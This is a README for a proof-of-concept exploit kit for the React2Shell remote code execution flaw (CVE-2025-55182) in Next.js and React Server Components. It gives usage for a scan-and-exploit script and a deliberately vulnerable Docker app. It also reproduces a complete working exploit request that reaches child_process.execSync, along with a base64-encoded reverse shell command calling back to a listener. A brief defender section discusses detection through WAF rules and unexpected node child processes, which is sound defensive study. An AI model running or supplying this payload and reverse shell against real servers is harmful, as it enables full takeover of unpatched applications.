## https://sploitus.com/exploit?id=8030509C-EE8F-5FBA-9CAA-8D9B926929AD
# ๐ฅ React2Shell-POC ๐ฅ



A collection of scripts / tools to experiment with the React2Shell vulnerability.
## Overview
This repository demonstrates the [React2Shell](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components) vulnerability affecting specific versions of Next.js and React Server Components, tracked as [CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182). This project includes:
- A Python script to scan and/or exploit vulnerable endpoints.
- A Dockerfile to build a deliberately vulnerable Next.js application for testing.
- A defenderโs perspective on React2Shell, with potential detection strategies.
## โก Quickstart Guide
### 1. Clone the Repository
```bash
git clone https://github.com/malwaredetective/React2Shell-POC.git
cd React2Shell-POC
```
### 2. Set Up a Python Virtual Environment
```bash
python3 -m venv venv
# Run this command to activate your Python Virtual Environment within Linux/macOS
source venv/bin/activate
# Run this command to activate your Python Virtual Environment within Windows
venv\Scripts\activate
```
### 3. Install Python Dependencies
```bash
pip install -r requirements.txt
```
### 4. Scan your Target Endpoints
By default, [React2Shell.py](React2Shell.py) will only send a null payload to test if the target is vulnerable.
```bash
python3 React2Shell.py --url http://localhost:3000/
```
If the target is vulnerable to CVE-2025-55182, the script will notify you within the output.
```bash
python3 React2Shell.py --url http://172.20.217.135:3000
[INFO] Scanning: http://172.20.217.135:3000 for the React2Shell CVE ...
[PWNED] VULNERABLE to CVE-2025-55182: http://172.20.217.135:3000.
- HTTP error returned!
- Next.js/React error digest detected in response!
- Patch immediately! See advisories: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components.
```
If the target is NOT vulnerable to CVE-2025-55182, the script will notify you within the output.
```bash
python3 React2Shell.py --url http://windowsforensics.net
[INFO] Scanning: http://windowsforensics.net for the React2Shell CVE ...
[OK] The target is not vulnerable: http://windowsforensics.net.
```
To trigger RCE using React2Shell, you need to include the `--exploit` flag and your payload within the `--cmd` parameter.
```bash
python3 React2Shell.py --url http://localhost:3000/ --exploit --cmd "cmd.exe /c calc.exe"
```
## ๐ณ Building a Vulnerable Node Application with Docker
The Dockerfile included within this repository will spin up a default node application running Next.js version 16.0.6, which is vulnerable to the React2Shell CVE.
> **Note:** This application is vulnerable by design. **Never expose it to the internet!**
### Build the Docker Image
```bash
docker build -t vulnerable-react2shell-app .
```
### Run the Container
```bash
docker run -it --rm -p 3000:3000 vulnerable-react2shell-app
```
## ๐ Analyzing React2Shell from a Defender's Perspective
The exploit is delivered via an HTTP POST request. Because the attack leverages legitimate application endpoints, it could be difficult to distinguish malicious traffic from normal user activity in web logs.
That being said, many commercial WAF providers have already implemented detection logic for this CVE and I'd recommend enabling those rules on any production applications.
I uploaded a full [packet capture](packet-capture.pcap) of the initial scan and successful exploitation against a vulnerable application.
Here is the HTTP POST request made by [React2Shell.py](React2Shell.py) when scanning the target for the CVE. The script analyzes the response from the target server to identify whether or not the server is vulnerable.
```http
POST / HTTP/1.1
Host: 172.20.217.135:3000
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary80196a6396324d35
Next-Action: 9fc786f413e34a478451b642105796f0
X-Nextjs-Request-Id: 7ad30895-bcbb-4458-bd57-abe580a4006a
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]
Content-Length: 232
------WebKitFormBoundary80196a6396324d35
Content-Disposition: form-data; name="1"
{}
------WebKitFormBoundary80196a6396324d35
Content-Disposition: form-data; name="0"
["$1:a:a"]
------WebKitFormBoundary80196a6396324d35--
HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-store, must-revalidate
Content-Type: text/x-component
Content-Encoding: gzip
Date: Wed, 10 Dec 2025 21:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked
:N1765401693616.3784
0:{"a":"$@1","f":"","b":"development"}
1:D{"time":0.28295799996703863}
1:E{"digest":"1430255494","name":"TypeError","message":"Cannot read properties of undefined (reading 'a')","stack":[],"env":"Server","owner":null}
```
The next HTTP POST request in the PCAP, is a successful attempt at obtaining a reverse shell on the target. The corresponding payload was: `python3 React2Shell.py --url http://172.20.217.135:3000 --exploit --cmd 'echo c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIwLjIxNy4xMzUvOTAwMSAwPiYx | base64 -d | bash'`.
```http
POST / HTTP/1.1
Host: 172.20.217.135:3000
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20242cd06a8246b9
Next-Action: 522a33fe16d7462fb41a936ca9c87721
X-Nextjs-Request-Id: 1f81ac3c-f5c7-4084-accf-1eacdfcba12c
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]
Content-Length: 640
------WebKitFormBoundary20242cd06a8246b9
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('echo c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIwLjIxNy4xMzUvOTAwMSAwPiYx | base64 -d | bash');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundary20242cd06a8246b9
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundary20242cd06a8246b9
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundary20242cd06a8246b9--
```
Monitoring your endpoints for unexpected child processes spawned by `node` is likely your best opportunity for detection. For example, after performing our demo exploitation, the process tree shows the node application spawning a reverse shell.
```
root@412435a91fdc:/app/vulnerable-next-js-app# ps -axjf
PPID PID PGID SID TTY TPGID STAT UID TIME COMMAND
0 137 137 137 pts/1 149 Ss 0 0:00 bash
137 149 149 137 pts/1 149 R+ 0 0:00 \_ ps -axjf
0 1 1 1 pts/0 134 Ssl 0 0:00 npm run dev
1 18 1 1 pts/0 134 S 0 0:00 sh -c next dev
18 19 1 1 pts/0 134 Sl 0 0:00 \_ node /app/vulnerable-next-js-app/node_modules/.bin/next dev
19 30 1 1 pts/0 134 Sl 0 0:08 \_ next-server (v16.0.6)
30 82 1 1 pts/0 134 Sl 0 0:00 \_ node /app/vulnerable-next-js-app/.next/dev/build/postcss.js 36051
30 130 1 1 pts/0 134 S 0 0:00 \_ /bin/sh -c echo c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIwLjIxNy4xMzUvOTAwMSAwPiYx | base64 -d | bash
130 133 1 1 pts/0 134 S 0 0:00 \_ bash
133 134 134 1 pts/0 134 S+ 0 0:00 \_ sh -i
```
> **Important Note**: Unlike Apache and IIS, it is not unusual for Node.js applications to spawn CMD, PowerShell, or Bash. This makes process-based detection challenging and context-dependent. Depending on your environment, this detection logic will likely require additional tuning before going into production.
## ๐ข References
- [https://react2shell.com/](https://react2shell.com/): The official writeup on React2Shell from the original author of the POC.
- [Official React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components): The official announcement about the CVE from the React Team and their guidance on remediation.
- [CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182): A link to the CVE-2025-55182 vulnerability entry within NIST.
- Detection logic was adapted from the [Burp Suite Community | React2Shell](https://github.com/PortSwigger/bambdas/blob/main/CustomScanChecks/CVE-2025-55182CVE-2025-66478-React2Shell.bambda) scanner when creating the Python script.
## ๐ก๏ธ Disclaimer
This POC is intended for educational purposes. **Do not scan or exploit systems without explicit permission!**